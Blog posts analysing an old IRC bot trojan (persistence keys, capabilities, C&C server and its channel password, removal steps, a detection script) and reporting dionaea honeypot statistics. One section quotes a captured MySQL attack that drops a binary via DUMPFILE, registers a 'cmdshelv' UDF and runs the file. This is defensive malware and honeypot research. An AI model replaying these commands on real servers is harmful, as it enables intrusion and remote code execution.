<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg74TlDCG9TPj86sp6efFSlmQlQxGlFjbnDbEL5jdoy0KcCQz5Yru9d1apYiKHd3c3HVqM2XIQ5EwkOS906BQwqTg94e9x3CDSz3tyLUt8IxGAVtIdJzPstjRoyIRAg6HMlCXmn8ZUC6gr-/s1600/Screenshot+at+2012-01-08+11%253A34%253A51.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg74TlDCG9TPj86sp6efFSlmQlQxGlFjbnDbEL5jdoy0KcCQz5Yru9d1apYiKHd3c3HVqM2XIQ5EwkOS906BQwqTg94e9x3CDSz3tyLUt8IxGAVtIdJzPstjRoyIRAg6HMlCXmn8ZUC6gr-/s320/Screenshot+at+2012-01-08+11%253A34%253A51.png" width="320" /></a></div>
<div style="text-align: justify;">
After that registry tweaking, the malware copies itself to c:\windows\system32\host.exe (host.exe is the original filename during spreading). It copies the creation, modification and access times of explorer.exe onto host.exe. Then, it runs the copy, which deletes the first malware file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The malware edits the registry to be executed after reboot: it adds an entry named "Windows Update" with "host.exe" as value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices} and in HKEY_CURRENT_USER\Software\Microsoft\OLE. Then a thread checks the running processes every 30 seconds against a list of around 600 process names. A second thread disables DCOM, restricts anonymous access and disables the IPC$ share every 2 minutes. The last created thread checks every 120 milliseconds that the malware will still be executed at OS startup. After the creation of these 3 threads, the Internet status is checked every 30 seconds and if the victim host has Internet access, the payload is run.</div>
<br />
<br />
<b><span style="font-size: large;">Payload</span></b><br />
<br />
<div style="text-align: justify;">
Of course, as this malware is an IRC bot, it implements some IRC commands like USER, PASS, NICK, JOIN, PONG, NOTICE, PRIVMSG, QUIT... After each action, the bot sends a NOTICE or PRIVMSG message to the IRC C&C server to report whether the action succeeded.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This payload has many features :</div>
<ul>
<li>keylogger</li>
<li>Ping, TCP, UDP, HTTP flood</li>
<li>DNS cache flush</li>
<li>ARP table flush</li>
<li>send email (spam)</li>
<li>search files and directories</li>
<li>move files</li>
<li>get information about the system : CPU number, CPU frequency, memory usage, disk space, disk type (network, cdrom ...), username, OS version (95, 98, ME, NT, 2000, 2003, XP or Unknown), user domain ...</li>
<li>get information about the network : IP, hostname, connection type</li>
<li>get the serial of 42 games (Counter-Strike, FIFA 2003... whole list <a class="vt-p" href="http://pastebin.com/U0Anbknq" target="_blank">here</a>), the Windows product key and the customer number</li>
<li>get clipboard data</li>
<li>list running AV/FW and other "security products" (ollydbg ...). The <a class="vt-p" href="http://pastebin.com/dsSNmyhq" target="_blank">list</a> contains around 600 processes.</li>
<li>list registered services and their status (unknown, paused, pausing, continuing, starting, stoping, stoped, running, stopped)</li>
<li>manage services</li>
<li>restore the system to a healthy state (delete the registry key and the malware file)</li>
<li>download and run binary files</li>
<li>send files</li>
<li>kill processes</li>
<li>reverse shell (after authentication on the bot)</li>
<li>update mechanism</li>
<li>network sniffing</li>
<li>TCP port scan</li>
<li>basic FTP server</li>
<li>basic HTTP server used to download files and to send back the file and directory search report</li>
<li>bruteforce SQL Server using a built-in list of around 1700 passwords (list <a class="vt-p" href="http://pastebin.com/E3rrFqr3" target="_blank">here</a>). If the logon succeeds, it downloads the malware by FTP and runs it thanks to "EXEC master..xp_cmdshell".</li>
<li>video recording using the webcam</li>
<li>screenshot capabilities</li>
<li>add C$, IPC$ and ADMIN$ network shares</li>
<li>...</li>
</ul>
<br />
<br />
<b><span style="font-size: large;">Commands</span></b><br />
<br />
A non-exhaustive list of IRC commands can be downloaded <a class="vt-p" href="http://pastebin.com/nxWKicMU" target="_blank">here</a>.<br />
<br />
<br />
<b><span style="font-size: large;">C&C</span></b><br />
<br />
<div style="text-align: justify;">
Botnet owners use IRC to exchange information with bots, send commands ... The domain name used to contact the C&C is blah.swXXXXXXXme.com and seems to be located in England (ISP : ValueVPS Limited - Hosting network). The IRC server used by this C&C is UnrealIRCd 3.2.7, listening on port 7878. The channels listed are #GuardBot-Admin, #uk, #fuckoff and #b (joined by bots). A password (imallowed2020) is required to join the #b channel.</div>
<div style="text-align: justify;">
Bot names are something similar to [GSA]-123456.</div>
<br />
Port 7878 isn't the only open port :<br />
<ul>
<li>80/tcp open http Apache httpd 2.2.14 ((Fedora))</li>
<li>99/tcp open ssh OpenSSH 5.1 (protocol 2.0)</li>
<li>6001/tcp open irc Unreal ircd (used to link to other irc servers)</li>
<li>7878/tcp open irc Unreal ircd (used by irc clients)</li>
<li>10000/tcp open http MiniServ 1.530 (Webmin httpd)</li>
<li>65146/tcp open irc Unreal ircd (used by irc clients)</li>
</ul>
<br />
<div style="text-align: justify;">
Apache is hosting the default Apache webpage and on port 10000 we can find the Webmin interface used to administer the server.</div>
<div style="text-align: justify;">
The OS seems to be Fedora 12 with a 2.6 kernel.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This C&C server doesn't control a huge botnet. I connected to this botnet several times, and the number of bots was between 467 and 1393. According to the IRC stats, the max number of IRC users (bots) was 4088.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<i>STATS u</i></div>
<div style="text-align: justify;">
<i>:pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20</i></div>
<div style="text-align: justify;">
<i>:pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In addition, this server suffers from reliability problems. During my analysis, it was sometimes unavailable (January 9th, 12th...).</div>
<br />
<br />
<b><span style="font-size: x-large;">How to delete it ?</span></b><br />
<br />
<div style="text-align: justify;">
As this malware isn't an advanced one, it's easy to remove from an infected computer. First you have to kill the "host.exe" process using the task manager or another tool. Then you must delete the file "host.exe" located in c:\windows\system32\. With the default view options, the file is invisible: you need to uncheck "Hide protected operating system files" in the Windows view options. Finally, in the registry you have to delete the "Windows Update" entry stored in HKEY_CURRENT_USER\Software\Microsoft\OLE and in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices}. It would be great to restore all the other registry values modified by the a.bat file at the beginning of the infection, but you would need the original values to do that ...</div>
<br />
<br />
<b><span style="font-size: x-large;">Comments</span></b><br />
<br />
<div style="text-align: justify;">
This malware isn't very stealthy because we can find it quite easily in the file system and it's even easier with the task manager. According to the Windows versions that the malware can detect and the list of games, I can say it's an old malware with no advanced protections against RE.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Nowadays, some (a lot of ?) malware is developed by governments and cybercriminal groups. I think that's not the case for this trojan because of its "simplicity", the unreliable C&C server and some strings found in it, like "Goodbye happy r00ting.", "NzmxFtpd Owns j0" and "Nice try, idiot.", which don't look professional.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have found on the Internet a SNORT rules file which lists the IP addresses used by the C&C server. So if you have an IDS in your company, you can use this <a class="vt-p" href="http://rules.emergingthreats.net/blockrules/emerging-botcc.rules" target="_blank">rules file</a>, which contains a list of known C&C servers, to generate alerts when a host is communicating with one of them.</div>
<div style="text-align: justify;">
<br /></div>
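The indicators described in this analysis (host.exe in system32, the "Windows Update" Run/RunServices/OLE entry, the [GSA]-NNNNNN nicknames and the #b channel) turned into checks, as an added example that is not part of the post; the registry export, process list and IRC capture are constructed sample data.

```python
"""Host and network checks for the IRC bot analysed above.

Added example, not code from the post. It only encodes indicators the
post reports (host.exe in system32, the "Windows Update" value under
Run/RunServices/OLE, [GSA]-NNNNNN nicknames, the #b channel); the
registry export, process list and IRC capture are constructed data.
"""
import re

PERSISTENCE_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_CURRENT_USER\Software\Microsoft\OLE",
}
PERSISTENCE_VALUE = "Windows Update"
DROPPED_FILE = r"\system32\host.exe"
BOT_NICK = re.compile(r"^\[GSA\]-\d{6}$")
BOT_CHANNEL = "#b"


def audit_registry(values):
    """values: iterable of (key, value_name, data) from a registry export."""
    findings = []
    for key, name, data in values:
        if (key in PERSISTENCE_KEYS and name == PERSISTENCE_VALUE
                and "host.exe" in data.lower()):
            findings.append(f"persistence: {key}\\{name} = {data}")
    return findings


def audit_processes(procs):
    """procs: iterable of (pid, image_path) from a process listing."""
    return [f"process: pid {pid} running {path}"
            for pid, path in procs if path.lower().endswith(DROPPED_FILE)]


def audit_irc(capture):
    """capture: iterable of (dst_port, line) from a reassembled TCP stream."""
    findings = []
    for port, line in capture:
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "NICK" and BOT_NICK.match(parts[1]):
            findings.append(f"irc: bot-style nick {parts[1]} (dst port {port})")
        if len(parts) >= 2 and parts[0] == "JOIN" and parts[1] == BOT_CHANNEL:
            findings.append(f"irc: join to bot channel {BOT_CHANNEL} (dst port {port})")
    return findings


# --- constructed sample data -------------------------------------------
REGISTRY_EXPORT = [
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Windows Update", "host.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\OLE", "Windows Update", "host.exe"),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Sidebar", r"C:\Program Files\Windows Sidebar\sidebar.exe"),
]
PROCESS_LIST = [
    (4, "System"),
    (1337, r"C:\WINDOWS\system32\host.exe"),
    (2048, r"C:\WINDOWS\explorer.exe"),
]
IRC_CAPTURE = [
    (7878, "NICK [GSA]-370921"),
    (7878, "USER gsa 0 * :gsa"),
    (7878, "JOIN #b <channel key>"),   # key left out on purpose
    (6667, "NICK alice"),
    (6667, "JOIN #linux"),
]


def run_all():
    """All findings over the constructed sample data."""
    return (audit_registry(REGISTRY_EXPORT) + audit_processes(PROCESS_LIST)
            + audit_irc(IRC_CAPTURE))


if __name__ == "__main__":
    for finding in run_all():
        print(finding)
```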
</div>Some stats of my dionaea honeypot (2011-10-09)<script src="http://www.google.com/jsapi" type="text/javascript">
</script>
<script type="text/javascript">
google.load('visualization', '1', {packages: ['geomap']});
</script>
<script type="text/javascript">
function drawVisualization() {
// Create and populate the data table.
var data = new google.visualization.DataTable();
data.addColumn('string', '', 'Country');
data.addColumn('number', 'Hosts');
data.addRows(45);
data.setValue(0, 0, 'FR');
data.setValue(0, 1, 157);
data.setValue(1, 0, 'BG');
data.setValue(1, 1, 3);
data.setValue(2, 0, 'UA');
data.setValue(2, 1, 22);
data.setValue(3, 0, 'HR');
data.setValue(3, 1, 3);
data.setValue(4, 0, 'SG');
data.setValue(4, 1, 4);
data.setValue(5, 0, 'BO');
data.setValue(5, 1, 1);
data.setValue(6, 0, 'JP');
data.setValue(6, 1, 4);
data.setValue(7, 0, 'CH');
data.setValue(7, 1, 6);
data.setValue(8, 0, 'BR');
data.setValue(8, 1, 6);
data.setValue(9, 0, 'FI');
data.setValue(9, 1, 24);
data.setValue(10, 0, 'RU');
data.setValue(10, 1, 29);
data.setValue(11, 0, 'NL');
data.setValue(11, 1, 5);
data.setValue(12, 0, 'PT');
data.setValue(12, 1, 5);
data.setValue(13, 0, 'NO');
data.setValue(13, 1, 11);
data.setValue(14, 0, 'TW');
data.setValue(14, 1, 5);
data.setValue(15, 0, 'TR');
data.setValue(15, 1, 13);
data.setValue(16, 0, 'NZ');
data.setValue(16, 1, 11);
data.setValue(17, 0, 'A2');
data.setValue(17, 1, 1);
data.setValue(18, 0, 'TH');
data.setValue(18, 1, 1);
data.setValue(19, 0, 'PK');
data.setValue(19, 1, 1);
data.setValue(20, 0, 'RO');
data.setValue(20, 1, 6);
data.setValue(21, 0, 'EG');
data.setValue(21, 1, 4);
data.setValue(22, 0, 'PL');
data.setValue(22, 1, 13);
data.setValue(23, 0, 'DE');
data.setValue(23, 1, 327);
data.setValue(24, 0, 'CO');
data.setValue(24, 1, 9);
data.setValue(25, 0, 'CN');
data.setValue(25, 1, 669);
data.setValue(26, 0, 'PS');
data.setValue(26, 1, 6);
data.setValue(27, 0, 'EE');
data.setValue(27, 1, 3);
data.setValue(28, 0, 'CA');
data.setValue(28, 1, 12);
data.setValue(29, 0, 'IR');
data.setValue(29, 1, 4);
data.setValue(30, 0, 'IT');
data.setValue(30, 1, 2);
data.setValue(31, 0, 'VN');
data.setValue(31, 1, 4);
data.setValue(32, 0, 'ZA');
data.setValue(32, 1, 6);
data.setValue(33, 0, 'CZ');
data.setValue(33, 1, 4);
data.setValue(34, 0, 'AU');
data.setValue(34, 1, 1);
data.setValue(35, 0, 'GB');
data.setValue(35, 1, 22);
data.setValue(36, 0, 'AZ');
data.setValue(36, 1, 3);
data.setValue(37, 0, 'ES');
data.setValue(37, 1, 45);
data.setValue(38, 0, 'ML');
data.setValue(38, 1, 1);
data.setValue(39, 0, 'US');
data.setValue(39, 1, 52);
data.setValue(40, 0, 'KR');
data.setValue(40, 1, 16);
data.setValue(41, 0, 'KW');
data.setValue(41, 1, 2);
data.setValue(42, 0, 'MY');
data.setValue(42, 1, 3);
data.setValue(43, 0, 'SE');
data.setValue(43, 1, 11);
data.setValue(44, 0, 'IL');
data.setValue(44, 1, 3);
var geomap = new google.visualization.GeoMap(document.getElementById('geo_map'));
geomap.draw(data, null);
}
google.setOnLoadCallback(drawVisualization);
</script>
Last month, my PC was running the Dionaea honeypot during two periods of a few days. So I decided to share some statistics about the attacked services, the location of the attackers, the OS of the attackers ...<br />
I have also listed the SQL queries used to get this information.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">P0f information</span></b><br />
<br />
<a class="vt-p" href="http://lcamtuf.coredump.cx/p0f.shtml">P0f</a> is a passive OS fingerprinting tool which analyzes network traffic to get information such as the operating system version, firewall presence, NAT use, distance to the remote host and also the kind of link used.<br />
FYI : You need to enable p0f in the dionaea configuration file and run the p0f tool in order to have this data.<br />
<br />
<i>select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc; </i><br />
<div>
<div style="text-align: left;">
<br /></div>
<table border="1" style="border-bottom-style: solid; border-collapse: collapse; border-left-style: solid; border-right-style: solid; border-top-style: solid; text-align: left;">
<tbody>
<tr>
<th>count</th><th>OS</th>
</tr>
<tr>
<td>7509</td><td></td>
</tr>
<tr>
<td>104</td><td>Windows 2000 SP4, XP SP1+</td>
</tr>
<tr>
<td>46</td><td>Windows XP/2000 (RFC1323+, w+, tstamp-)</td>
</tr>
<tr>
<td>31</td><td>Windows 2000 SP2+, XP SP1+ (seldom 98)</td>
</tr>
<tr>
<td>17</td><td>Linux 2.6 (newer, 3)</td>
</tr>
<tr>
<td>11</td><td>Linux 2.6 (newer, 2)</td>
</tr>
<tr>
<td>8</td><td>Windows XP SP1+, 2000 SP3</td>
</tr>
<tr>
<td>7</td><td>Linux 2.4-2.6</td>
</tr>
<tr>
<td>6</td><td>Windows XP/2000 (RFC1323+, w, tstamp+)</td>
</tr>
<tr>
<td>3</td><td>Windows 95</td>
</tr>
<tr>
<td>2</td><td>SunOS 4.1.x</td>
</tr>
<tr>
<td>1</td><td>Linux 2.6? (barebone, rare!)</td>
</tr>
<tr>
<td>1</td><td>Windows 98 (no sack)</td>
</tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<br />
<i>select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;</i><br />
<i><br /></i><br />
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>link</th>
</tr>
<tr>
<td>6051</td><td></td>
</tr>
<tr>
<td>1533</td><td>ethernet/modem</td>
</tr>
<tr>
<td>101</td><td>pppoe (DSL)</td>
</tr>
<tr>
<td>39</td><td>IPv6/IPIP</td>
</tr>
<tr>
<td>10</td><td>(Google/AOL)</td>
</tr>
<tr>
<td>5</td><td>GPRS, T1, FreeS/WAN</td>
</tr>
<tr>
<td>3</td><td>PIX, SMC, sometimes wireless</td>
</tr>
<tr>
<td>3</td><td>sometimes DSL (2)</td>
</tr>
<tr>
<td>1</td><td>vtun</td>
</tr>
</tbody></table>
<br />
<div>
<br />
<b><span class="Apple-style-span" style="font-size: large;">Targeted local port</span></b></div>
<div>
<br /></div>
<div>
<i>select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;</i>
<br />
<i><br /></i></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>targeted port</th>
</tr>
<tr>
<td>1201</td><td>42</td>
</tr>
<tr>
<td>335</td><td>80</td>
</tr>
<tr>
<td>123</td><td>135</td>
</tr>
<tr>
<td>113</td><td>1433</td>
</tr>
<tr>
<td>87</td><td>32554</td>
</tr>
<tr>
<td>72</td><td>32045</td>
</tr>
<tr>
<td>61</td><td>5060</td>
</tr>
<tr>
<td>38</td><td>3389</td>
</tr>
<tr>
<td>38</td><td>8008</td>
</tr>
<tr>
<td>37</td><td>23</td>
</tr>
<tr>
<td colspan="2">...</td>
</tr>
<tr>
<td>18</td><td>445</td>
</tr>
<tr>
<td colspan="2">...</td>
</tr>
</tbody></table>
<br />
Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Location of attackers / malware sources</span></b><br />
<div>
<br /></div>
<div>
<i>select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;</i><br />
<br /></div>
<div id="geo_map" style="height: 350px; width: 600px;">
</div>
<div>
<br />
If we look at the map, we can see a lot of connections from France. I can explain some of them: while my honeypot was running, I launched some port scans myself. In order to have reliable statistics, I removed the connections coming from my IP from the sqlite database, but I think I've missed some of them.<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Protocol information</span></b><br />
<br />
<i>select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>connection_transport</th>
</tr>
<tr>
<td>6959</td><td>tcp</td>
</tr>
<tr>
<td>85</td><td>udp</td>
</tr>
<tr>
<td>13</td><td>tls</td>
</tr>
</tbody></table>
<br />
<div>
<br /></div>
<div>
<i>select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>connection_protocol</th>
</tr>
<tr>
<td>3929</td><td>pcap</td>
</tr>
<tr>
<td>1204</td><td>mirrorc</td>
</tr>
<tr>
<td>1201</td><td>mirrord</td>
</tr>
<tr>
<td>335</td><td>httpd</td>
</tr>
<tr>
<td>123</td><td>epmapper</td>
</tr>
<tr>
<td>113</td><td>mssqld</td>
</tr>
<tr>
<td>70</td><td>SipSession</td>
</tr>
<tr>
<td>54</td><td>TftpClient</td>
</tr>
<tr>
<td>17</td><td>smbd</td>
</tr>
<tr>
<td>7</td><td>mysqld</td>
</tr>
<tr>
<td>4</td><td>SipCall</td>
</tr>
</tbody></table>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Default passwords</span></b><br />
<br />
<div>
<i>select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;</i><br />
<br /></div>
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>count</th><th>login_username</th><th>login_password</th><th>connection_protocol</th><th>local_port</th>
</tr>
<tr>
<td>95</td><td>sa</td><td></td><td>mssqld</td><td>1433</td>
</tr>
<tr>
<td>6</td><td>root</td><td></td><td>mysqld</td><td>3306</td>
</tr>
</tbody></table>
<br />
<div>
<br /></div>
<div>
<div>
Malware targeting my honeypot tried to connect to MySQL with root/&lt;blank&gt; and to Microsoft SQL Server with sa/&lt;blank&gt;, which are both default credentials.</div>
<div>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">MySQL requests</span></b><br />
<br />
<i>select * from mysql_command_args;</i></div>
</div>
<div>
<br />
The output of this query is quite fun :<br />
<blockquote>
drop function cmdshell<br />
drop function cmdshell<br />
drop function my_udfdoor<br />
drop function my_udfdoor<br />
drop function do_system<br />
drop function do_system<br />
use mysql;<br />
use mysql;<br />
drop table if exists tempMix4;<br />
drop table if exists tempMix4;<br />
create table if not exists tempMix4(data LONGBLOB);<br />
create table if not exists tempMix4(data LONGBLOB);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
INSERT INTO tempMix4 VALUES (@a);<br />
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';<br />
drop table if exists tempMix4;<br />
use mysql;<br />
drop table if exists tempMix;<br />
create table if not exists tempMix(data LONGBLOB);<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
INSERT INTO tempMix VALUES (@a);<br />
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'<br />
INSERT INTO tempMix4 VALUES (@a);<br />
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'<br />
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';<br />
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'<br />
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'<br />
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'<br />
drop table if exists tempMix4;<br />
select data from tempMix into DUMPFILE 'D:\\amd.dll'<br />
use mysql;<br />
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'<br />
drop table if exists tempMix;<br />
create table if not exists tempMix(data LONGBLOB);<br />
create function cmdshelv returns string soname 'amd.dll';<br />
create function cmdshelv returns string soname 'amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'<br />
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';<br />
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';<br />
create function cmdshelv returns string soname 'amd.dll'<br />
select cmdshelv('c:\\12345.exe')<br />
select cmdshelv('c:\\12345.exe');<br />
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);<br />
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');</blockquote>
<br />
<div>
For more information, you can read this article: <a class="vt-p" href="http://carnivore.it/2011/06/12/the_mysql_cmdshelv">http://carnivore.it/2011/06/12/the_mysql_cmdshelv</a></div>
<br />
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">RPC vulnerabilities</span></b><br />
<br />
<i>select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";</i><br />
<br />
<table border="1" style="border-collapse: collapse; border-style: solid;">
<tbody>
<tr>
<th>dcerpcservice_name</th><th>dcerpcserviceop_name</th><th>dcerpcserviceop_vuln</th>
</tr>
<tr>
<td>DCOM</td><td>RemoteActivation</td><td>MS03-26</td>
</tr>
<tr>
<td>DSSETUP</td><td>DsRolerUpgradeDownlevelServer</td><td>MS04-11</td>
</tr>
<tr>
<td>ISystemActivator</td><td>RemoteCreateInstance</td><td>MS04-12</td>
</tr>
<tr>
<td>MSMQ</td><td>QMCreateObjectInternal</td><td>MS07-065</td>
</tr>
<tr>
<td>MSMQ</td><td>QMDeleteObject</td><td>MS05-017</td>
</tr>
<tr>
<td>NWWKS</td><td>NwChangePassword</td><td>MS06-66</td>
</tr>
<tr>
<td>NWWKS</td><td>NwOpenEnumNdsSubTrees</td><td>MS06-66</td>
</tr>
<tr>
<td>PNP</td><td>PNP_QueryResConfList</td><td>MS05-39</td>
</tr>
<tr>
<td>SRVSVC</td><td>NetPathCanonicalize</td><td>MS08-67</td>
</tr>
<tr>
<td>SRVSVC</td><td>NetPathCompare</td><td>MS08-67</td>
</tr>
<tr>
<td>WKSSVC</td><td>NetAddAlternateComputerName</td><td>MS03-39</td>
</tr>
<tr>
<td>nddeapi</td><td>NDdeSetTrustedShareW</td><td>MS04-031</td>
</tr>
</tbody></table>
<br />
<br />
<br /></div>
<div>
<b><span class="Apple-style-span" style="font-size: large;">Malware URLs</span></b></div>
<div>
<br /></div>
<div>
<i>select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;</i></div>
<div>
<br /></div>
<div>
All the malware samples were downloaded from TFTP servers and are linked to connections on port 135. As the URLs point to malware, I won't show them here.</div>
<div>
<br /></div>
<div>
<br />
<br />
<span class="Apple-style-span" style="font-size: large;"><b>Virustotal reports</b></span></div>
<div>
<br /></div>
<div>
<i>select virustotal_permalink from virustotals;</i><br />
<br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887">http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039">http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944">http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946">http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477">http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825">http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850">http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851">http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666">http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864">http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714">http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714</a><br />
<a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380">http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380</a><br />
<br />
All these URLs are Virustotal reports of malware captured by my honeypot. Most of them were submitted to Virustotal this summer. According to the reports, they are all IRC bots. As the detection rate is high (between 93% and 98%), they are not a major threat to our computers as long as the user is not careless.</div>
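The four queries in this post all run against dionaea's logsql SQLite database. As an added example that is not part of the post or of dionaea's own code, the Python script below builds an in-memory SQLite database from a constructed subset of that schema (only the tables and columns the queries above reference; every row, id and MD5 value is made-up sample data, not honeypot output) and runs the RPC-vulnerability join and the download/connection join. It goes one step beyond the post with a per-port count, which is how I would actually verify the "every sample arrived on port 135" observation rather than reading it off the raw rows.

```python
import sqlite3

# Constructed subset of dionaea's logsql schema: table and column names are the
# ones the post's queries reference; everything else (ids, rows, hashes) is
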